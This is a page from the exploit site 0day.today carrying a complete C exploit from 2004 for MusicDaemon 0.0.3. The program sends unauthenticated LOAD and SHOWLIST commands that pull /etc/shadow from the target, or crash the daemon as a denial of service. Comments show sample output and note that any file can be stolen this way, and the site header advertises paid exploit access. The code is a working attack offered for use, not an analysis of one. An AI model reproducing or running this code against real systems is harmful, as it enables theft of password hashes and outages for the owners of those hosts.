0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MusicDaemon <= 0.0.3 v2 Remote DoS and /etc/shadow Stealer
[==========================================================
MusicDaemon <= 0.0.3 v2 Remote DoS and /etc/shadow Stealer
==========================================================
/* MusicDaemon <= 0.0.3 v2 Remote /etc/shadow Stealer / DoS
* Vulnerability discovered by: Tal0n 05-22-04
* Exploit code by: Tal0n 05-22-04
*
* Greets to: atomix, vile, ttl, foxtrot, uberuser, d4rkgr3y, blinded, wsxz,
* serinth, phreaked, h3x4gr4m, xaxisx, hex, phawnky, brotroxer, xires,
* bsdaemon, r4t, mal0, drug5t0r3, skilar, lostbyte, peanuter, and over_g
*
* MusicDaemon MUST be running as root, which it does by default anyways.
* Tested on Slackware 9 and Redhat 9, but should work generically since the
* nature of this vulnerability doesn't require
* shellcode or return addresses.
*
*
* Client Side View:
*
* root@vortex:~/test# ./md-xplv2 127.0.0.1 1234 shadow
*
* MusicDaemon <= 0.0.3 Remote /etc/shadow Stealer
*
* Connected to 127.0.0.1:1234...
* Sending exploit data...
*
* <*** /etc/shadow file from 127.0.0.1 ***>
*
* Hello
* <snipped for privacy>
* ......
* bin:*:9797:0:::::
* ftp:*:9797:0:::::
* sshd:*:9797:0:::::
* ......
* </snipped for privacy>
*
* <*** End /etc/shadow file ***>
*
* root@vortex:~/test#
*
* Server Side View:
*
* root@vortex:~/test/musicdaemon-0.0.3/src# ./musicd -c ../musicd.conf -p 1234
* Using configuration: ../musicd.conf
* [Mon May 17 05:26:07 2004] cmd_set() called
* Binding to port 5555.
* [Mon May 17 05:26:07 2004] Message for nobody: VALUE: LISTEN-PORT=5555
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called Binding to port 1234.
* [Mon May 17 05:26:11 2004] New connection!
* [Mon May 17 05:26:11 2004] cmd_load() called
* [Mon May 17 05:26:13 2004] cmd_show() called
* [Mon May 17 05:26:20 2004] Client lost.
*
*
* As you can see, it simply makes a connection, sends the commands, and
* leaves. MusicDaemon doesn't even log that new connection's IPs that I
* know of. Works very well, eh? :)
*
* The vulnerability is in where the is no authenciation for 1. For 2, it
* will let you "LOAD" any file on the box if you have the correct privledges,
* and by default, as I said before, it runs as root, unless you change the
* configuration file to make it run as a different user.
*
* After we "LOAD" the /etc/shadow file, we do a "SHOWLIST" so we can grab
* the contents of the actual file. You can subtitute any file you want in
* for /etc/shadow, I just coded it to grab it because it being such an
* important system file if you know what I mean ;).
*
* As for the DoS, if you "LOAD" any binary on the system, then use "SHOWLIST",
* it will crash music daemon.
*
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(int argc, char *argv[]) {
char buffer[16384];
char *xpldata1 = "LOAD /etc/shadow\r\n";
char *xpldata2 = "SHOWLIST\r\n";
char *xpldata3 = "CLEAR\r\n";
char *dosdata1 = "LOAD /bin/cat\r\n";
char *dosdata2 = "SHOWLIST\r\n";
char *dosdata3 = "CLEAR\r\n";
int len1 = strlen(xpldata1);
int len2 = strlen(xpldata2);
int len3 = strlen(xpldata3);
int len4 = strlen(dosdata1);
int len5 = strlen(dosdata2);
int len6 = strlen(dosdata3);
if(argc != 4) {
printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow
Stealer / DoS");
printf("\nDiscovered and Coded by: Tal0n
05-22-04\n");
printf("\nUsage: %s <host> <port> <option>\n",
argv[0]);
printf("\nOptions:");
printf("\n\t\tshadow - Steal /etc/shadow file");
printf("\n\t\tdos - DoS Music Daemon\n\n");
return 0; }
printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow
Stealer / DoS\n\n");
int sock;
struct sockaddr_in remote;
remote.sin_family = AF_INET;
remote.sin_port = htons(atoi(argv[2]));
remote.sin_addr.s_addr = inet_addr(argv[1]);
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\nError: Can't create socket!\n\n");
return -1; }
if(connect(sock,(struct sockaddr *)&remote,
sizeof(struct sockaddr)) < 0) {
printf("\nError: Can't connect to %s:%s!\n\n",
argv[1], argv[2]);
return -1; }
printf("Connected to %s:%s...\n", argv[1], argv[2]);
if(strcmp(argv[3], "dos") == 0) {
printf("Sending DoS data...\n");
send(sock, dosdata1, len4, 0);
sleep(2);
send(sock, dosdata2, len5, 0);
sleep(2);
send(sock, dosdata3, len6, 0);
printf("\nTarget %s DoS'd!\n\n", argv[1]);
return 0; }
if(strcmp(argv[3], "shadow") == 0) {
printf("Sending exploit data...\n");
send(sock, xpldata1, len1, 0);
sleep(2);
send(sock, xpldata2, len2, 0);
sleep(5);
printf("Done! Grabbing /etc/shadow...\n");
memset(buffer, 0, sizeof(buffer));
read(sock, buffer, sizeof(buffer));
sleep(2);
printf("\n<*** /etc/shadow file from %s ***>\n\n",
argv[1]);
printf("%s", buffer);
printf("\n<*** End /etc/shadow file ***>\n\n");
send(sock, xpldata3, len3, 0);
sleep(1);
close(sock);
return 0; }
return 0; }
# 0day.today [2024-11-15] #